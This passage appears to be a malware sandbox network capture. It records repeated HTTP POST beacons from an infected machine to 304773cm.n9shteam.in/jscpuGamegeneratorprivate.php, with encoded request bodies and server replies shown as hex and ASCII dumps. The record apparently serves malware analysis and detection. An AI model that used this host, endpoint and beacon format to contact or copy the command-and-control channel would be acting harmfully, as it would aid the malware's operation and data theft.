4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ~{CcIybZI_U\|wtQk`[B{cxLbcZwpvR{auKuf\|K\|qxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|[}i`uIyt`xgtO{gma\|HocnAtJldpIi[sabc\zQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtL
Oct 27, 2024 02:44:42.149872065 CEST	913	IN	Data Raw: 6d 4f 77 75 5a 42 7e 6c 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a Data Ascii: mOwuZB~lStBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBa

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	50016	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:44:53.485948086 CEST	319	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:44:53.843419075 CEST	344	OUT	Data Raw: 00 00 04 03 03 08 04 00 05 06 02 01 02 0c 01 03 00 0a 05 00 02 07 03 09 07 01 0e 03 06 07 06 00 0c 01 07 01 02 04 05 0a 0c 0a 05 57 04 0a 07 00 07 02 0d 59 0a 07 06 02 05 01 04 06 06 00 04 09 02 01 0d 0b 04 01 04 54 0b 04 0e 00 0f 06 0f 00 07 02 Data Ascii: WYTRVW\L~Ncvvqav\p@\|o~_t\|hMRJ{\|]x^vK}nptYs\iO~V@x}\}Lu
Oct 27, 2024 02:44:54.081074953 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:44:54.396588087 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:44:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hE0Ps9j3DPToX6Axfr1Umm6HXFSlFkxUC83T78kAfkzmb%2FpKnUD0udaUh1DN7VcpsDmY%2Bmp101YiaXi8V%2F8K7aINtIdCjVABsqf5YcJD2OZ0GlydWykMnIZc3lm4n8D0zWRGZTOIsQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea905a84dddac-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1059&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=663&delivery_rate=1289403&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 5c 6f 7d 78 58 6f 4c 5d 59 7e 71 74 5b 69 67 63 0b 68 5e 5c 52 6d 5a 7f 5e 7e 04 64 49 60 05 79 0d 6d 61 75 44 76 58 5d 5b 7d 71 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 79 02 69 59 69 07 78 67 5a 4e 6c 77 6b 5d 6c 7e 77 04 78 62 77 58 7a 70 7e 04 6b 5e 5a 07 7b 67 60 49 6a 5c 70 5a 76 72 64 05 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}\o}xXoL]Y~qt[igch^\RmZ^~dI`ymauDvX][}qxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\yiYixgZNlwk]l~wxbwXzp~k^Z{g`Ij\pZvrdzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~l
Oct 27, 2024 02:44:54.396601915 CEST	905	IN	Data Raw: 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 Data Ascii: StBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	50017	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:45:01.286842108 CEST	272	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:45:01.640275955 CEST	344	OUT	Data Raw: 00 00 01 01 03 0b 04 07 05 06 02 01 02 01 01 0a 00 0b 05 0e 02 0c 03 00 07 06 0d 07 06 0f 03 05 0d 52 03 0e 01 03 06 56 0f 05 04 02 06 02 07 55 05 0a 0e 5d 0e 0f 06 55 01 06 05 05 01 05 00 0f 02 00 0f 00 06 04 05 06 0e 54 0f 0f 0a 02 0d 03 06 04 Data Ascii: RVU]UTVTW\L}RYft[b]a\t\|Rf_tlt\|M`KlU`_oceYh}xtgk]u~V@zmPrW
Oct 27, 2024 02:45:01.876427889 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:45:02.187419891 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:45:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E83rMC%2BWQwp01gVmh7smIzHjeG33WE9XL0qlSjd0RbgwH1LaDJEsmT4usUrrB3RuvnIGQ9m1yJSfPB3bR0hhJIWq2CY4sHw2xrqdU9z3QNLOXb1tutqlYRlaLmagpB0HwwxLoYtxuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea9365be86c5b-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1253&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=616&delivery_rate=1239726&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 5e 7a 6d 56 5f 78 5c 77 58 7c 58 74 58 7c 77 70 50 7f 63 65 4f 7b 60 60 06 7d 71 64 4b 76 63 5b 4f 6e 62 69 4b 76 66 7b 58 6a 5b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5b 6a 5b 7d 70 50 5b 7b 5e 73 5d 7b 67 5a 4f 78 54 7f 49 79 04 60 01 7b 63 72 4c 6b 06 6f 5b 6c 67 60 02 7c 71 73 02 76 61 6c 00 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}^zmV_x\wX\|XtX\|wpPceO{``}qdKvc[OnbiKvf{Xj[xUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|[j[}pP[{^s]{gZOxTIy`{crLko[lg`\|qsvalzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lStBpM
Oct 27, 2024 02:45:02.187438965 CEST	898	IN	Data Raw: 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c 52 00 77 4d 79 Data Ascii: ]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\`\m

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	50018	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:45:13.534641981 CEST	284	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:45:13.890558958 CEST	344	OUT	Data Raw: 00 03 01 00 06 0b 04 02 05 06 02 01 02 0c 01 07 00 02 05 0b 02 0d 03 0d 00 01 0f 54 04 52 01 05 0a 00 03 0b 00 0d 05 04 0c 00 05 0b 06 53 07 04 03 03 0c 01 0d 52 04 0b 06 04 03 04 06 52 00 0e 01 0b 0d 0f 06 06 06 55 0e 07 0c 07 0d 54 0f 03 07 03 Data Ascii: TRSRRUT]W\L}P`Xca}acQuOcU`BhMxIl\|wlyZkT`vwsZ~_~V@{}rLbe
Oct 27, 2024 02:45:14.130858898 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:45:14.590523958 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EyvxlfIiMUoUGptD4tRQ%2FjslLd2GjJzAexBtnoTBM%2FKR6Fski0Zz2CBoEBm0xG7%2FTpcx%2BDtVBkzfnsR7rxLlk06k5rrQoqt%2B1FpgbHz1wfbQ41IlodqoYMXIxMKcWzPJIXXW6AF6Pg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea982fc72e962-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1325&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=628&delivery_rate=1132134&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 59 78 7e 7c 5a 7b 5c 56 04 68 07 7f 03 6a 67 73 09 7f 5e 75 0a 7b 70 73 5d 7f 71 64 00 63 73 75 40 6d 61 7d 02 62 65 67 5b 7e 61 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 6d 01 7d 63 6d 07 79 67 73 5c 6c 67 5a 00 79 7e 63 00 79 62 60 49 6f 73 65 5a 7c 73 74 01 6c 5e 7f 5b 6a 4c 70 5c 61 62 6c 47 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}Yx~\|Z{\Vhjgs^u{ps]qdcsu@ma}beg[~axUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\m}cmygs\lgZy~cyb`IoseZ\|stl^[jLp\ablGzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~
Oct 27, 2024 02:45:14.590538979 CEST	906	IN	Data Raw: 6c 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 Data Ascii: lStBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~J
Oct 27, 2024 02:45:14.590559006 CEST	906	IN	Data Raw: 6c 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 Data Ascii: lStBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~J

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	50019	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:45:21.600655079 CEST	284	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:45:21.953015089 CEST	344	OUT	Data Raw: 05 01 01 01 03 08 01 00 05 06 02 01 02 01 01 0a 00 06 05 0b 02 0c 03 0e 07 01 0f 56 05 57 01 08 0d 06 06 0c 07 03 07 02 0e 57 06 53 04 06 02 03 07 04 0e 0d 0a 01 05 03 07 05 04 01 07 0a 05 0c 01 04 0f 0f 00 05 04 02 0f 57 0c 0e 0d 0c 0e 51 02 04 Data Ascii: VWWSWQR\PR\L~pX@tqr_uu`BBucRRh]hK{BcEz`e^\|CTwIw^i_~V@zmbLri
Oct 27, 2024 02:45:22.200206995 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:45:22.520334005 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:45:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f9ZNPWI6v4sWx4YLrgj%2Fr5uQSNh3XbV07tu1XvW1QeoxaSny%2FsKvwbjiN9jVtROkQtr%2F02MkMqksZ1M2VXiw7Oxe6WMEDyxlhlPDrp9H9xpZuYKI7IzxN4tD1DNRgxeN4LIeY%2BgiXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea9b568d0485f-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2036&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=628&delivery_rate=764116&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 5c 6c 53 67 4b 79 62 73 5c 7f 62 74 5a 69 5e 64 52 7c 4e 53 42 6e 60 70 00 7e 4c 7b 5a 77 73 79 0d 6d 5f 58 5a 61 48 7b 58 69 61 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 76 5c 6a 4e 7e 5a 6f 59 7f 5c 6f 49 5e 07 6c 7d 60 5a 78 62 5d 59 7a 60 62 04 7c 4e 52 07 7b 67 64 00 7d 62 73 4f 76 07 64 4a 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}\lSgKybs\btZi^dR\|NSBn`p~L{Zwsym_XZaH{XiaxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\v\jN~ZoY\oI^l}`Zxb]Yz`b\|NR{gd}bsOvdJzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lS
Oct 27, 2024 02:45:22.520360947 CEST	903	IN	Data Raw: 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c Data Ascii: tBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	50020	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:45:33.809778929 CEST	284	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:45:34.155982018 CEST	344	OUT	Data Raw: 05 02 04 01 06 0d 04 05 05 06 02 01 02 07 01 05 00 06 05 0b 02 07 03 0d 00 53 0e 03 06 01 03 04 0c 04 05 00 00 04 05 05 0f 05 04 01 06 00 05 55 05 03 0d 08 0e 03 07 0b 04 50 04 01 04 57 07 00 00 06 0f 5c 00 03 04 52 0b 04 0f 02 0d 01 0f 51 07 51 Data Ascii: SUPW\RQQQ\L}S\|`~O`[uu\`klr^cUhkZlyl]Jz`r}noS`I[}_~V@A{SbL}Le
Oct 27, 2024 02:45:34.437757969 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:45:34.785350084 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:45:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VIs1hSNmAIDxjnLXHH1i%2BqlmrtCfdI2XlRogqt09fG0vmvztQgBeZj1SQlckceAHWh6FCh1I%2F5cqgzVwFjAKBjN7LDnaxxf2yTN9vk9pHkgNmtzYKvWN96IhnRvm0cetYAXDx1i3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8eaa01d948e52c-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1183&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=628&delivery_rate=1240788&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7e 06 6f 54 7f 06 7b 4c 64 49 7f 5f 67 00 7d 67 7b 0a 7f 63 75 42 7a 5a 73 5d 6a 5c 56 00 74 60 7e 50 6e 71 66 5f 76 66 64 06 7e 4b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5b 62 59 7e 63 6a 59 6f 67 70 43 6c 59 51 5e 6c 53 5e 58 79 5c 6c 48 6c 60 62 06 7d 70 63 59 79 77 56 4a 7c 62 78 5c 76 5f 64 04 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 